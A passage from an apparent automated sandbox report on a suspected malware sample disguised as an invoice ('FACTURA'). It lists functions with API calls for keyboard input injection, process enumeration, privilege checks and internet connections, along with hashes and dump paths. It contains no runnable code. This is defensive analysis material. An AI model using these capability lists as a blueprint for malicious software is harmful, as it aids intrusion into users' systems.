                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: df2f4602445ef405dbf79786d414d4a9a4be5db1c385479ab130a9d95014323f
                                                                            • Instruction ID: 7e46a8f8ace38ea940f9a074257ee4d317f190977268d1d4eae7540321eccc80
                                                                            • Opcode Fuzzy Hash: df2f4602445ef405dbf79786d414d4a9a4be5db1c385479ab130a9d95014323f
                                                                            • Instruction Fuzzy Hash: AE31C334A40108EEEB219B58CC45BB97BA5EB057A3F944112FF11F62A1CE31D94ABB53
                                                                            Function 00F5AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5AB60
                                                                            • GetWindowRect.USER32(?,?), ref: 00F5ABD6
                                                                            • PtInRect.USER32(?,?,00F5C014), ref: 00F5ABE6
                                                                            • MessageBeep.USER32(00000000), ref: 00F5AC57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 1daca0275b788bcf32442ffa1af9ff75f24a217ba4e04f737faead1fcf941797
                                                                            • Instruction ID: b1dcdfc60822197e9bab03916520796e5f4430ffd0a94982afb75810385e44a1
                                                                            • Opcode Fuzzy Hash: 1daca0275b788bcf32442ffa1af9ff75f24a217ba4e04f737faead1fcf941797
                                                                            • Instruction Fuzzy Hash: ED41B330A00208DFCB12DF58C888B597BF5FF49712F1882A5EE559B364D730E859EB92
                                                                            Function 00F30AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F30B27
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F30B43
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F30BA9
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F30BFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1751e7025c63809268fab338b6c3aeed4e2d4673d994de639b64a0aa84680376
                                                                            • Instruction ID: 8ecb7cf50f52f0e6d483cc7ec8839d88cbfe25dd6fcd0478c39fa4a2ff026952
                                                                            • Opcode Fuzzy Hash: 1751e7025c63809268fab338b6c3aeed4e2d4673d994de639b64a0aa84680376
                                                                            • Instruction Fuzzy Hash: BA314B70D40318AEFB308B298C15BFAFBA9AB85335F08436BF581D21D1CB748944B755
                                                                            Function 00F30C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00F30C66
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F30C82
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F30CE1
                                                                            • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00F30D33
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 440cbbb193ac4aede1b694122ea938306ace59fc1c81ad6c07669cd5a548e03e
                                                                            • Instruction ID: 95e967f030b0582a5a357e2fbafd5752e1214ce7adae60fb4fd8d07d64627e92
                                                                            • Opcode Fuzzy Hash: 440cbbb193ac4aede1b694122ea938306ace59fc1c81ad6c07669cd5a548e03e
                                                                            • Instruction Fuzzy Hash: 3F313730E403186EFF308A648C247FEBBA5AB45331F08536BE481621D1DB799945F7A1
                                                                            Function 00F061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F061FB
                                                                            • __isleadbyte_l.LIBCMT ref: 00F06229
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F06257
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F0628D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 424552d61c6ec4e294cd9a5fb72ecc7c32918dfe7eabc2864c1f4338e4bfb37a
                                                                            • Instruction ID: 30766830516139f655a154318dca1dbc657b359ac4b8fd175960d4cb57036f2d
                                                                            • Opcode Fuzzy Hash: 424552d61c6ec4e294cd9a5fb72ecc7c32918dfe7eabc2864c1f4338e4bfb37a
                                                                            • Instruction Fuzzy Hash: 8031AE31A0424AAFDF218F65CC44BBA7BA9BF41720F154029F864D71E1D731D960FB90
                                                                            Function 00F54EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00F54F02
                                                                              • Part of subcall function 00F33641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3365B
                                                                              • Part of subcall function 00F33641: GetCurrentThreadId.KERNEL32 ref: 00F33662
                                                                              • Part of subcall function 00F33641: AttachThreadInput.USER32(00000000,?,00F35005), ref: 00F33669
                                                                            • GetCaretPos.USER32(?), ref: 00F54F13
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00F54F4E
                                                                            • GetForegroundWindow.USER32 ref: 00F54F54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 083215c2560347936aa670782d0df936708c10fb42eb60e3c94fd9fc6088f22c
                                                                            • Instruction ID: a6b091762e29133e1cdffc7d7ced1c86a9d0dde80410173ecbe3eb87ad04f0ab
                                                                            • Opcode Fuzzy Hash: 083215c2560347936aa670782d0df936708c10fb42eb60e3c94fd9fc6088f22c
                                                                            • Instruction Fuzzy Hash: 0A312D71D00208AFCB00EFA5CC859EFB7F9EF88304F10406AE915E7241EA75AE459BA0
                                                                            Function 00F33C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F33C7A
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F33C88
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F33CA8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F33D52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 3116973660b975d59c1054e3b465800e977e62b6dd0bae319d62dfbf63e1dd86
                                                                            • Instruction ID: 21344ac372dd04ec680fe79f11583cec44087a2deecde15c3ffd4f5408185053
                                                                            • Opcode Fuzzy Hash: 3116973660b975d59c1054e3b465800e977e62b6dd0bae319d62dfbf63e1dd86
                                                                            • Instruction Fuzzy Hash: 0231C8711083059FD300EF54D881ABFBBE8EF95364F50082DF5D1962A1EB71DA4ADB92
                                                                            Function 00F28656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28121
                                                                              • Part of subcall function 00F2810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F2812B
                                                                              • Part of subcall function 00F2810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2813A
                                                                              • Part of subcall function 00F2810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F28141
                                                                              • Part of subcall function 00F2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28157
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F286A3
                                                                            • _memcmp.LIBCMT ref: 00F286C6
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F286FC
                                                                            • HeapFree.KERNEL32(00000000), ref: 00F28703
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 2182266621-0
                                                                            • Opcode ID: d813bd575847d6847609449f20fcfd422544ba9d54e6c3db394700b5d86355cf
                                                                            • Instruction ID: 74c3b8e0aa7edcaa104b6f38d2d66afeefdc841668abbc936cbbaa3fa3daf34a
                                                                            • Opcode Fuzzy Hash: d813bd575847d6847609449f20fcfd422544ba9d54e6c3db394700b5d86355cf
                                                                            • Instruction Fuzzy Hash: 7E21C131E0221CEFDB10DFA4D948BEEBBB8EF50355F144099E405A7241DB30AE06EB50
                                                                            Function 00EF098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 00EF09AE
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            • _fprintf.LIBCMT ref: 00EF09E5
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00F25DBB
                                                                              • Part of subcall function 00EF4AAA: _flsall.LIBCMT ref: 00EF4AC3
                                                                            • __setmode.LIBCMT ref: 00EF0A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: f60c51fbb98cbafda217ce9121b1fc17c1c22b39eda41e912ef67766b13ad05d
                                                                            • Instruction ID: 4e0377e5c8c605270714fa6d1df78b26c0dd6edb2bcf5ac0d7d5c5b3a6c172bf
                                                                            • Opcode Fuzzy Hash: f60c51fbb98cbafda217ce9121b1fc17c1c22b39eda41e912ef67766b13ad05d
                                                                            • Instruction Fuzzy Hash: F91102B290460C6BDB08B3B4AC469BEB7E9DF81360F241056F304B72C3EE304846A7A5
                                                                            Function 00F41767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F417A3
                                                                              • Part of subcall function 00F4182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F4184C
                                                                              • Part of subcall function 00F4182D: InternetCloseHandle.WININET(00000000), ref: 00F418E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: b0a4e5b6257c9884dae7f9884ddde35a50aad6ce46d488515d34c0b58b0645cc
                                                                            • Instruction ID: 7494d18bdd257d7f90b038cc42e5cc7d3f985bce1d07193f92b65d98b8520b63
                                                                            • Opcode Fuzzy Hash: b0a4e5b6257c9884dae7f9884ddde35a50aad6ce46d488515d34c0b58b0645cc
                                                                            • Instruction Fuzzy Hash: 9921AE36600705BFEB129F60DC01FBABFA9FF48711F10402AFE5196651DB759851BBA0
                                                                            Function 00F33A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00F5FAC0), ref: 00F33A64
                                                                            • GetLastError.KERNEL32 ref: 00F33A73
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F33A82
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F5FAC0), ref: 00F33ADF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: e8444cfde01d29d17dafaa2de328a4404b53e5c766a8684f9fd5a37fd803f118
                                                                            • Instruction ID: eda9f7841fb3f17d450b62311325cdcd0e59730d0f7e6e0e62f054407f24beb4
                                                                            • Opcode Fuzzy Hash: e8444cfde01d29d17dafaa2de328a4404b53e5c766a8684f9fd5a37fd803f118
                                                                            • Instruction Fuzzy Hash: 9921B1755083058F8700EF28C88186ABBE8EF55374F104A6AF4D9C72A1E735DA0AEB42
                                                                            Function 00F2DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F2F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?), ref: 00F2F0CB
                                                                              • Part of subcall function 00F2F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2F0F1
                                                                              • Part of subcall function 00F2F0BC: lstrcmpiW.KERNEL32(00000000,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?), ref: 00F2F122
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DCEC
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DD12
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DD46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 5c87a4b39908b13daddd56ebbfa8578965c213fc635dda9dad1e70766496e3c4
                                                                            • Instruction ID: 1cc1b8b764eae9771428ca2d71ccf6a000411098f72ad27ef6edea01968c6393
                                                                            • Opcode Fuzzy Hash: 5c87a4b39908b13daddd56ebbfa8578965c213fc635dda9dad1e70766496e3c4
                                                                            • Instruction Fuzzy Hash: A811D33A600319EBDB25AF34EC45D7A77A8FF45310B80506AF906CB2A1EB71D841E7D1
                                                                            Function 00F050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00F05101
                                                                              • Part of subcall function 00EF571C: __FF_MSGBANNER.LIBCMT ref: 00EF5733
                                                                              • Part of subcall function 00EF571C: __NMSG_WRITE.LIBCMT ref: 00EF573A
                                                                              • Part of subcall function 00EF571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            • Opcode ID: c05e9a3f88fb06b10be24493e3639f047e5d1a0abb5b9f33dd20afd1ba3cb3fc
